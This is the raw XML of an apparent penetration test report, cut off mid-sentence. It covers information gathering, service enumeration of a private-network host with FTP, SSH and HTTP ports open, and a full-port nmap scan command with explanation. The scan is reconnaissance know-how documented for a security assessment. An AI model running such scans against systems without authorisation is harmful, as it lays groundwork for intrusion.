        <w:spacing w:before="352" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="112" w:right="131" w:firstLine="5"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52FB2CF6" w14:textId="77777777" w:rsidR="00744D2A" w:rsidRDefault="00744D2A" w:rsidP="00744D2A">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="352" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="112" w:right="131" w:firstLine="5"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A8BE9B5" w14:textId="77777777" w:rsidR="005D4D8F" w:rsidRDefault="00FC621F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="542"/>
        </w:tabs>
        <w:ind w:left="542" w:hanging="425"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="Methodologies"/>
      <w:bookmarkStart w:id="13" w:name="_bookmark6"/>
      <w:bookmarkEnd w:id="12"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>ethodologies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8BE9B6" w14:textId="77777777" w:rsidR="005D4D8F" w:rsidRDefault="005D4D8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="33"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="41"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A8BE9B7" w14:textId="2911DF88" w:rsidR="005D4D8F" w:rsidRDefault="00946A86">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="249" w:lineRule="auto"/>
        <w:ind w:left="109" w:right="127" w:firstLine="7"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve">For </w:t>
      </w:r>
      <w:r w:rsidR="009E372A">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>his penetration test, I used widely known and</w:t>
      </w:r>
      <w:r w:rsidR="006C5402">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> tested tools</w:t>
      </w:r>
      <w:r w:rsidR="009E372A">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> and procedures</w:t>
      </w:r>
      <w:r w:rsidR="006C5402">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> to ensure an effective and efficient test. </w:t>
      </w:r>
      <w:r w:rsidR="00FC621F">
        <w:t xml:space="preserve">Below is a breakout of how I was able to identify and exploit the variety of </w:t>
      </w:r>
      <w:r w:rsidR="00D52F03">
        <w:t>system vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8BE9B8" w14:textId="77777777" w:rsidR="005D4D8F" w:rsidRDefault="005D4D8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="219"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A8BE9B9" w14:textId="77777777" w:rsidR="005D4D8F" w:rsidRDefault="00FC621F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="653"/>
        </w:tabs>
        <w:ind w:left="653" w:hanging="536"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="Information_Gathering"/>
      <w:bookmarkStart w:id="15" w:name="_bookmark7"/>
      <w:bookmarkEnd w:id="14"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r>
        <w:rPr>
          <w:color w:val="272727"/>
        </w:rPr>
        <w:t>Information</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="272727"/>
          <w:spacing w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="272727"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Gathering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8BE9BA" w14:textId="5D979406" w:rsidR="005D4D8F" w:rsidRDefault="00FC621F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="351" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="117" w:right="101" w:hanging="6"/>
        <w:jc w:val="both"/>
      </w:pP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gathering</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>portion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penetration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identifying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scope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t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D52F03">
        <w:t>pene</w:t>
      </w:r>
      <w:r>
        <w:t>tration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>test</w:t>
      </w:r>
      <w:r w:rsidR="00AC012D">
        <w:t>, such as the specified network or devices</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2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penetration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>test,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tasked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exploiting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AC012D">
        <w:t xml:space="preserve">a specific device on </w:t>
      </w:r>
      <w:r w:rsidR="006226A1">
        <w:t>the network</w:t>
      </w:r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specific IP address</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> w</w:t>
      </w:r>
      <w:r w:rsidR="006226A1">
        <w:t>as</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8BE9BB" w14:textId="4333492A" w:rsidR="005D4D8F" w:rsidRDefault="00FC621F">
      <w:pPr>
        <w:spacing w:before="118"/>
        <w:ind w:left="117"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Network</w:t>
      </w:r>
      <w:r w:rsidR="006226A1">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> Device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8BE9C0" w14:textId="03B8EEB2" w:rsidR="005D4D8F" w:rsidRDefault="00FC621F" w:rsidP="006226A1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="662"/>
        </w:tabs>
        <w:spacing w:before="191"/>
        <w:ind w:hanging="175"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>192.168.</w:t>
      </w:r>
      <w:r w:rsidR="006226A1">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>1.211</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8BE9C1" w14:textId="77777777" w:rsidR="005D4D8F" w:rsidRDefault="005D4D8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="233"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A8BE9C2" w14:textId="77777777" w:rsidR="005D4D8F" w:rsidRDefault="00FC621F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="653"/>
        </w:tabs>
        <w:ind w:left="653" w:hanging="536"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="Penetration"/>
      <w:bookmarkStart w:id="17" w:name="_bookmark8"/>
      <w:bookmarkEnd w:id="16"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r>
        <w:rPr>
          <w:color w:val="272727"/>
          <w:spacing w:val="-2"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>Penetration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8BE9C3" w14:textId="6DDDCBD8" w:rsidR="005D4D8F" w:rsidRDefault="00FC621F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="351" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="117" w:right="135" w:hanging="6"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The penetration testing portions of the assessment focus heavily on gaining access to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008E3865">
        <w:t>services running on the target system</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3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penetration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>test,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successfully</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>gain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007810C1">
        <w:t xml:space="preserve">admin access to </w:t>
      </w:r>
      <w:r w:rsidR="00977BF5">
        <w:t>2 of 3 services that were running</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B5B6F8" w14:textId="77777777" w:rsidR="004B6D23" w:rsidRDefault="004B6D23">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="351" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="117" w:right="135" w:hanging="6"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="707AF598" w14:textId="77777777" w:rsidR="004B6D23" w:rsidRDefault="004B6D23">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="351" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="117" w:right="135" w:hanging="6"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24601F0B" w14:textId="77777777" w:rsidR="004B6D23" w:rsidRDefault="004B6D23">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="351" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="117" w:right="135" w:hanging="6"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3850FAD8" w14:textId="77777777" w:rsidR="004B6D23" w:rsidRDefault="004B6D23">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="351" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="117" w:right="135" w:hanging="6"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A8BE9C4" w14:textId="77777777" w:rsidR="005D4D8F" w:rsidRDefault="005D4D8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="139"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="406E3527" w14:textId="77777777" w:rsidR="004B6D23" w:rsidRDefault="004B6D23">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="139"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35D28690" w14:textId="77777777" w:rsidR="004B6D23" w:rsidRDefault="004B6D23">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="139"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A8BE9C6" w14:textId="157B6F97" w:rsidR="005D4D8F" w:rsidRDefault="00FC621F" w:rsidP="00811643">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="891"/>
        </w:tabs>
        <w:spacing w:before="283"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_bookmark9"/>
      <w:bookmarkStart w:id="19" w:name="_bookmark10"/>
      <w:bookmarkEnd w:id="18"/>
      <w:bookmarkEnd w:id="19"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Service</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8BE9CA" w14:textId="719D08E7" w:rsidR="005D4D8F" w:rsidRDefault="00FC621F" w:rsidP="008E63F7">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="290" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="117" w:right="135" w:hanging="6"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The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enumeration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>portion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penetration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gathering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what services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 w:rsidR="00E86FCA">
        <w:t>running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 w:rsidR="004B6D23">
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidR="00E86FCA">
        <w:t xml:space="preserve"> target system</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="63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valuable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attacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="20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rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>detailed</w: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7A8BEA4D" wp14:editId="7A8BEA4E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>2758097</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>986942</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2044064" cy="2032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064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064" h="20320">
                              <a:moveTo>
                                <a:pt x="2043798" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="0" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="20205"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="2043798" y="20205"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="2043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431EB" id="Graphic 9" o:spid="_x0000_s1026" style="position:absolute;margin-left:217.15pt;margin-top:77.7pt;width:160.95pt;height:1.6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4406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" path="m2043798,l,,,20205r2043798,l2043798,xe" fillcolor="#999" stroked="f">
                <v:path arrowok="t"/>
                <w10:wrap anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="004E414A">
        <w:rPr>
          <w:spacing w:val="-2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attack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>vectors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system.</w:t>
      </w:r>
      <w:r w:rsidR="00CD26F8">
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> By knowing what services and </w:t>
      </w:r>
      <w:r w:rsidR="008259E6">
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve">service version the system is running, attackers can research and spot vulnerable services that could </w:t>
      </w:r>
      <w:r w:rsidR="004072F9">
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>be exploited to gain system access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8BE9CB" w14:textId="26A22059" w:rsidR="005D4D8F" w:rsidRDefault="00FC621F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="4867"/>
        </w:tabs>
        <w:spacing w:before="129" w:line="530" w:lineRule="atLeast"/>
        <w:ind w:left="3043" w:right="3061"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="487354880" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7A8BEA4F" wp14:editId="7A8BEA50">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>2758097</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>470831</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2044064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0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064">
                              <a:moveTo>
                                <a:pt x="0" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="2043798" y="0"/>
                              </a:lnTo>
                            </a:path>
                          </a:pathLst>
                        </a:custGeom>
                        <a:ln w="6921">
                          <a:solidFill>
                            <a:srgbClr val="99999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E587B" id="Graphic 10" o:spid="_x0000_s1026" style="position:absolute;margin-left:217.15pt;margin-top:37.05pt;width:160.95pt;height:.1pt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440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" path="m,l2043798,e" filled="f" strokecolor="#999" strokeweight=".19225mm">
                <v:path arrowok="t"/>
                <w10:wrap anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:t>Server IP Address</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-44"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Ports Open </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>192.168.</w:t>
      </w:r>
      <w:r w:rsidR="004072F9">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="004072F9">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>211</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>TCP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00100DA0">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>21, 22, 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8BE9CC" w14:textId="76AFC41A" w:rsidR="005D4D8F" w:rsidRDefault="00FC621F" w:rsidP="00100DA0">
      <w:pPr>
        <w:spacing w:before="14"/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7A8BEA51" wp14:editId="7A8BEA52">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>2758097</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>238243</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2044064" cy="2032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064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064" h="20320">
                              <a:moveTo>
                                <a:pt x="2043798" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="0" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="20205"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="2043798" y="20205"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="2043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76938" id="Graphic 11" o:spid="_x0000_s1026" style="position:absolute;margin-left:217.15pt;margin-top:18.75pt;width:160.95pt;height:1.6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4406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" path="m2043798,l,,,20205r2043798,l2043798,xe" fillcolor="#999" stroked="f">
                <v:path arrowok="t"/>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8BE9CD" w14:textId="77777777" w:rsidR="005D4D8F" w:rsidRDefault="005D4D8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="145"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A8BE9CE" w14:textId="77777777" w:rsidR="005D4D8F" w:rsidRDefault="00FC621F">
      <w:pPr>
        <w:ind w:left="117"/>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Nmap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Scan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Results:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3459637C" w14:textId="5194EAAE" w:rsidR="00996FB1" w:rsidRDefault="00996FB1">
      <w:pPr>
        <w:ind w:left="117"/>
        <w:rPr>
          <w:bCs/>
          <w:spacing w:val="-2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve">Nmap is a network scanning tool that can be used to </w:t>
      </w:r>
      <w:r w:rsidR="001E7627">
        <w:rPr>
          <w:bCs/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>discover hosts on a network, along with services running on those devices. This is a common tool hackers use to gain initial information on the system they are attacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F1D8B0" w14:textId="77777777" w:rsidR="001E7627" w:rsidRDefault="001E7627">
      <w:pPr>
        <w:ind w:left="117"/>
        <w:rPr>
          <w:bCs/>
          <w:spacing w:val="-2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6896ECD3" w14:textId="49C9409F" w:rsidR="001E7627" w:rsidRDefault="00BC4615" w:rsidP="00BC4615">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
          <w:spacing w:val="-2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve">Command Ran: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00311C06">
        <w:rPr>
          <w:bCs/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00311C06">
        <w:rPr>
          <w:bCs/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>sSV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00311C06">
        <w:rPr>
          <w:bCs/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> -T4 -O -p0-65535 192.168.1.211</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18AC302F" w14:textId="6723D3C7" w:rsidR="00311C06" w:rsidRPr="00BC4615" w:rsidRDefault="00311C06" w:rsidP="00BC4615">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve">   This command scans</w:t>
      </w:r>
      <w:r w:rsidR="00103948">
        <w:rPr>
          <w:bCs/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> all the ports on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> the target machine to attempt to see the services running,</w:t>
      </w:r>
      <w:r w:rsidR="00103948">
        <w:rPr>
          <w:bCs/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00082748">
        <w:rPr>
          <w:bCs/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>and also</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00082748">
        <w:rPr>
          <w:bCs/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> view the </w:t>
      </w:r>
      <w:r w:rsidR="00103948">
        <w:rPr>
          <w:bCs/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>operating system</w:t>
      </w:r>
      <w:r w:rsidR="00082748">
        <w:rPr>
          <w:bCs/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC624A6" w14:textId="77777777" w:rsidR="00610522" w:rsidRDefault="00610522">
      <w:pPr>
        <w:spacing w:before="131" w:line="340" w:lineRule="auto"/>
        <w:ind w:left="117" w:right="6686"/>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Proof Screenshot</w:t>
      </w:r>
      <w:r w:rsidR="00FC621F">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED6D446" w14:textId="53EBF76C" w:rsidR="00E047E4" w:rsidRDefault="00E047E4">
      <w:pPr>
        <w:spacing w:before="131" w:line="340" w:lineRule="auto"/>
        <w:ind w:left="117" w:right="6686"/>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E7FCFD7" wp14:editId="6C4376E7">
            <wp:extent cx="5924550" cy="2402205"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="103872299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22990" name="Picture 2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87F" w14:textId="20032CAC" w:rsidR="009D173F" w:rsidRDefault="00FC621F" w:rsidP="00562A13">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r w:rsidRPr="00562A13">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Vulnerability</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="009D173F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D87133">
        <w:t>This command allows an attacker to view services running on a machine. While this is not a critical vulnerability</w:t>
      </w:r>
      <w:r w:rsidR="00562A13">
        <w:t>, services that are not used should be turned off, and ones that are being used need to be kept up to date</w:t>
      </w:r>
      <w:r w:rsidR="00241FAC">
        <w:t xml:space="preserve">. By quickly searching the version of these services, I was able to find critical vulnerabilities that </w:t>
      </w:r>
      <w:r w:rsidR="004A00C8">
